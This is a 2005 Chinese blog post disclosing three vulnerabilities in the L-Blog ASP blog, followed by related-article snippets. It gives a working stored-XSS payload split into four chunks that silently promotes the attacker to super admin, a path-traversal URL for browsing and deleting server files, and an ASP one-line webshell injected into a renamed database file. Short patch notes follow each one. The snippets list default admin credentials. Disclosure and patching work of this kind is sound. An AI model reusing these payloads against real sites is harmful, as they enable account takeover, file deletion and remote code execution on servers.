L-Blog的三个漏洞

最新推荐文章于 2022-10-13 21:47:09 发布
最新推荐文章于 2022-10-13 21:47:09 发布
阅读量3.3k 收藏
点赞数
分类专栏: 技术文档 文章标签: 数据库 scripting blog asp javascript cookies
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/lake2/article/details/566939
版权

Authorlake2 http://lake2.0x54.org

Date 2005-12-29

 

L-Blog是由 Loveyuki 自主开发的基于 ASP+Access 的小型单用户BLOG,好像网上用的比较多,主要是免费的(呵呵,向Loveyuki致敬)。昨天寝室断网了,闲着没事干,就把以前下载的L-Blog V1.08 (SE) Final版本拿来看,结果还真发现了几个问题。

 

1L-Blog Cross-Site Scripting Vulnerability

这是个跨站漏洞,好像HaK_BaN很早就发现并通知了官方,所以问题已经修复。但是我下的那个版本却存在,所以还是要写出来J

问题存在于申请友情链接那里,对提交的网站名称没有进行HTML编码就直接写入数据库,管理员浏览读出的时候也没有进行编码,造成跨站脚本漏洞。

怎么利用呢,盗管理员Cookies?太麻烦,其实可以直接用javascript把页面转向到提升一般用户为超级管理员的链接。

呵呵,那就注册个帐号先,然后记住帐号的id,然后构造语句咯。

先看看把一般用户提升成超级管理员的链接,http://localhost/L-Blog/admincp.asp?action=member&type=editmem&memID=2&memType=SupAdmin,嗯我们可以提交<script>location.href=” admincp.asp?action=member&type=editmem&memID=2&memType=SupAdmin”</script>达到转向的目的。参数memID就是你要提升权限的用户id,这里我的id2

且慢,这里有两个问题,第一是数据库Blog_links表里的Link_Name字段最多放50个字符;第二是如果转向管理员会发现不对劲哦。所以要用拆分字符分次提交,而且使用框架让管理员看不到。

算了一下,至少要分四次提交,看exploit

<script>a="<iframe src=admincp.asp?actio"</script>

<script>a+="n=member&type=editmem&memID="</script>

<script>a+="2&memType=SupAdmin width="</script>

<script>a+="0 height=0>";document.write(a);</script>

呵呵,然后就等着管理员去看链接验证咯。要是等不及了可以想办法让他去看,看你的社会工程学水平了。

漏洞修补问题,最简单就是去官方下补丁。

 

2L-Blog File List / Delete with SuperAdmin Vulnerability

通过前面的漏洞我们可以成为blog管理员,现在我们得想办法拿webshell啊。呵呵,这个时候用这个漏洞最好不过了。好像还没人公布的说。

在附件管理选浏览all_files里的文件,看它的URLhttp://localhost/L-Blog/admincp.asp?action=attachment&foldername=All_Files,嘿嘿问题就出在参数foldername,没有过滤./,那就可以跨目录的哦。用这个url看看http://localhost/L-Blog/admincp.asp?action=attachment&foldername=..,呵呵,怎么样,blog根目录文件出来了,可以随便删除文件的哦。

利用这个漏洞我们可以任意查看网站各目录的文件,不过你要猜到文件夹才能浏览,L-Blog的数据库放在blogdata下,看看咯:http://localhost/L-Blog/admincp.asp?action=attachment&foldername=../blogdata

如果它的数据库是mdb,那就下载之,如果改成了asp/asa,那就请你看第三个漏洞哈。

这个漏洞的修复就是修改文件admincp.asp,只要把变量Request.QueryString("filename")里的“.”过滤就行了。

 

3L-Blog .asp/.asa DataBase Execute ASP Code Vulnerability

L-Blog的默认数据库名字是L-Blog.mdb,但是很多站长应该会改名称和后缀,一般改为asp或者asa,呵呵,如果改了,那站就完咯。

L-Blog.mdb里面有一个貌似防下载的表aNotDownload,其实一点用都没有,就算你改了后缀照样可下载。当然不去下载它,我是要拿webshell

现在就要向数据库写小马咯。

随便找个没有过滤html编码的地方,就找修改一般设置,Blog名称,填<%execute(request("x"))%>,然后再访问数据库,看看是不是有类型不匹配错误,ok,搞定!

漏洞的修复也简单,随便找个动网的数据库,找到notdown表导出到L-Blog的数据库中,呵呵,然后你再访问数据库试试。世界清静了……

lake2
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 13
    评论
专栏目录
博客(Blog)程序分类选介
不论你在什么时候开始,重要的是开始之后就不要停止。
08-09 1712
第一种:ASP1、《L-Blog》http://www.loveyuki.com/由loveyuki自主开的基于Asp+Access的小型单用户Blog,更新很快,很多版本提供,模板有的非常漂亮。2、《Dlog》http://webdream.duoluo.com/国人开发比较早的一个Blog,最新版是V2.2,已经停止开发,但已是很完善的程序了。3、《Misslog》http://misslog
z-blog+php+漏洞,Z-Blog的PHP版前台存储型XSS漏洞
weixin_29432775的博客
03-19 613
### 简要描述:看到你们内测的消息我就屁颠屁颠地跑过来了,花了两个通宵看代码发现几处漏洞..这里先绕过了你们XSS过滤脚本..### 详细说明:问题出在/zb_system/function/c_system_common.php```function TransferHTML($source,$para){if(strpos($para, '[nohtml]')!==false){$sourc...
入侵博客漏洞
河北正定欢迎您-少占鱼
10-23 993
入侵博客漏洞2007-03-20 15:52博客,曾是涂鸦文字、倾吐心事的天堂。如今,面对自身的漏洞、黑客的攻击,这个精神的殿堂坍塌了……  本期,我们会结合实例对博客中的四大漏洞进行介绍,希望能使更多的人关注博客的安全问题。入侵博客太简单  对于网站、论坛之类的网页程序来说,由于它们建立在大中型的网站服务器上,早已经过多次黑客攻击的洗礼,因此一般来说很少存在着明显的漏洞。  而博客(Blog)则
春秋云镜wp day1
xy404的博客
10-13 3603
今天看到之前买了内网渗透那本书,今天看到靶场上线了,打一天玩一下,总体cve的洞很好刷,比打CTF轻松多了。
开源网站的漏洞复现(appcms、wordpress)
先剃度再出家
03-22 3513
开源网站的漏洞复现一、appcms二、wordpress     本文的开源网站主要选取了appcms、wordpress两个开源网站来复现。     如果需要这两个网站的压缩包请自取:https://blog.csdn.net/weixin_45873676/article/details/112985656 一、appcms     主要应用XSS。     网页打开如下所示:     随意点开某个软件它都存在留言板如下:     用户可以随意评论,如下所示:     直接上传xss恶意代码显然不
Cgi-bin 30个漏洞+使用方法.txt
07-18
Cgi-bin 30个漏洞+使用方法
exploit (Linux 内核CVE-2024-1086漏洞复现脚本)
最新发布
06-06
Linux 内核CVE-2024-1086漏洞复现脚本。 在普通用户下,将文件上传后,chmod 777 exploit ,然后运行 ./exploit ,提权成功,输入id,可看到已经是root权限 。
DVWA-安装-漏洞测试-漏洞修复指南.docx
05-17
DVWA-安装-漏洞测试-漏洞修复指南-需要安装 xpmpp或WampServer。
L-Blog v1.08 (SE) 蓝色鼻涕制造美化版
07-19
L-Blog v1.08 (SE) 蓝色鼻涕制造美化版
L-Blog v1.08(SE) Final兄弟修改版.rar
07-05
欢迎使用L-Blog V1.08(SE) Final兄弟修改版,鉴于原版本经常受广告评论和垃圾引用的困扰,兄弟对程序进行了以下优化: 2010-1-4 1 修改了标签页面与SQL防注页面冲突的问题,同时修复了标签页面的提权漏洞 2 修改了首页的显示模式,采用默认展开式显示和列表式显示两种方式 3 增加了最新日志和最热日志调用模块,在需要的地方直接用call NewBlogList和call hotBlogList即可,跟首页里的Call NewCommList的使用方式一样. 2010-1-3 1 增加了留言本的功能,修改了和增加了相关的页面! 2 修改了跨站攻击的漏洞,后台管理页面,留言管理页面,日志评论页面,评论列表页面等指定用户访问,请不要修改管理账号admin,否则大部分页面都必须修改! 3 为防止跨站攻击,博客锁定为单用户使用和管理,只有管理员可以发表博文以及删除相关评论等.即使他人通过提权的方式把账号升级到管理员的身份,也一样无法发表,修改,删除相关的内容,也无法进入后台进行管理! 4 加入最近的SQL防注入程序,可以同时防止GET,POST,COOKIES的注入! 2010-1-2 1:修改验证码的显示方式,采用手工点击显示的方式,有效防止广告评论,主要修改了注册页面register.asp和评论发表页面blogview.asp 2:增加了关键字过滤以及IP过滤的功能,更新了数据库Blog_info表的结构,更新了commond.asp,Function.asp,blogcomm.asp,admincp.asp 等页面,登陆后台可以直接设置限制的IP和过滤的关键字. 3:增加了TAGS(标签)功能,数据库中增加了blog_tag和blog_tags两个表,更新了Function.asp,blogpost.asp,blogedit.asp,default.asp等相关页面,增加了blogtag.asp和tags.asp,并优化了版面. 4:更新了blogview.asp,blogvisit.asp的IP查询功能,直接调用http://www.030904.com/ip/index.asp的纯真IP数据库,删除了ipview.asp页面. 5:独立了数据库结构,把访问统计的数据单独放到一个数据库,避免数据过多的时候导致博客访问速度慢的问题,如果你的博客按每日1万条记录增加的话,每月的数据库将达到30M,不出半年,你的博客就慢如牛车. 6:虽然独立了数据库,后台管理也同时更新,后台可以直接删除访问记录,可以压缩和备份数据库. 7:处理了一些页面可能出现乱码的情况,关闭了引用页面,防止垃圾引用,如果要开启,请删除trackback.asp的以下内容:   8:修改了search.asp页面版面无法对齐的问题. 9:增加了数据库防下载功能 10:后面管理账户是admin,密码是admin888 如有其它问题,欢迎光临我的博客:http://www.030904.com/blog/default.asp
一捧雪博客(L-BLOG美化版本)
05-11
* 1.集成相册模块 * 2.集成下载模块 * 3.集成论坛模块 * 4.集成TAGS功能 管理员账号 用户:admin 密码:admin888
L-Blog v1.08 (SE) Final Build 0524
06-05
已经具备的大部分BLOG功能,可以发表隐藏的日志!<br>新增功能:<br>1、天气功能<br>2、修正BUG<br>默认用户名:admin 密码:admin888
L-Blog v1.06 中娱博客修改版
08-07
本程序修改于国际沙龙BLOG,在原程序里面修改了相关的页面存在的BUG,优化了一些版面,后台也做出了一点优化。帐号:admin密码:admin888
四招轻松黑博客网站-没看此文章的朋友已经OUT了
java开发指南博客 【转载】
04-02 524
大家好,现在博客网站非常的火,可是漏洞不少,今天给大家做个动画,四招轻松黑博客网站!! 欢迎大家光临小站,涩狼网盟 http://slwm.qq.to 这里还有感谢网友:世界末日,帮我指出网站漏洞!还要感谢一直支持我的朋友! 首先声明,现在我们应该起黑小日本的服务器,对于这个教程只是给大家一个思路!!希望大家在对外方面可以用得上! 好,我们开始! 首先,第一个方法是大家熟悉的文件上传...
asp+access环境下4款blog程序推荐
柳永法的个人博客
07-04 949
本文兼向所有为blogger无私奉献的blog开发者们致以敬意L-blog使用者最多的blog程序,并有很多其他二次开发版,特点是简单易用,并且够用。我现在就使用的是L-blog程序,期间也曾想换成其他程序,最后都因为都不够绝对理想而作罢。我认为L-blog最大的特点是方便,比如那个登陆后可以在浏览界面上直接选择文章进行编辑,这样省事很多,不明白为什么其他blog程序为什么没将这个优点继承。而
z-blog漏洞php,Z-blog跨站脚本攻击漏洞
weixin_30959465的博客
03-10 2184
漏洞说明:Z-Blog是一款基于Asp平台的Blog博客(网志)程序,支持Wap,支持Firefox,Oprea等浏览器,在国内使用非常广泛,官方主页在http://www.rainbowsoft.org/。Z-blog代码严谨,前台功能简洁,后台功能强大,这为它的产品安全带来很大的优势,但是80sec在产品中发现一个严重的跨站脚本攻击漏洞,加上产品设计上的一些问题可能带来严重的后果。漏洞厂商:h...
z-blog漏洞php,zblog1.51 php版GetShell漏洞
weixin_42501161的博客
03-10 2814
GetShell漏洞的分析相关环境源码信息:zblog 1.51问题文件:\zb_users\plugin\AppCentre\plugin_edit.php漏洞类型:文件写入导致代码执行站点地址:https://www.zblogcn.com/在文件\zb_users\plugin\AppCentre\plugin_edit.php的第47行-68行中发现如下代码块,仔细分析该代码块可以知道,两...
cve-2023-44313漏洞
02-03
CVE-2023-44313是一个安全漏洞,其涉及到某个特定软件或系统的代码中存在的问题。该漏洞可能导致攻击者利用该软件或系统的弱点,来执行恶意代码或获取未授权的访问权限。 对于CVE-2023-44313漏洞,它可能具有多种不同的影响。例如,攻击者可能能够通过利用该漏洞,绕过身份验证机制并访问系统中的敏感数据。此外,他们还可以执行未经授权的命令,使系统陷入不稳定状态,甚至导致系统崩溃。 为了解决CVE-2023-44313漏洞,软件或系统的开发者通常会发布一个安全更新或补丁程序。这个补丁会修复软件或系统中存在的漏洞,加强安全性并防止攻击者利用该漏洞。因此,作为用户,我们应该及时安装这些更新或补丁,以确保自己的系统免受该漏洞的影响。 此外,我们还可以采取其他一些措施来防止CVE-2023-44313漏洞的利用。例如,我们应该确保使用的软件和系统是最新版本,因为较旧的版本可能会存在已知的漏洞。此外,保持杀毒软件和防火墙的最新更新也是很重要的,因为它们可以帮助我们检测和阻止潜在的恶意活动。 总之,CVE-2023-44313漏洞是一个需要引起关注并及时处理的安全漏洞。通过安装最新的安全更新和补丁,以及保持软件和系统的最新版本,我们可以显著降低受到该漏洞攻击的风险。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 13
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值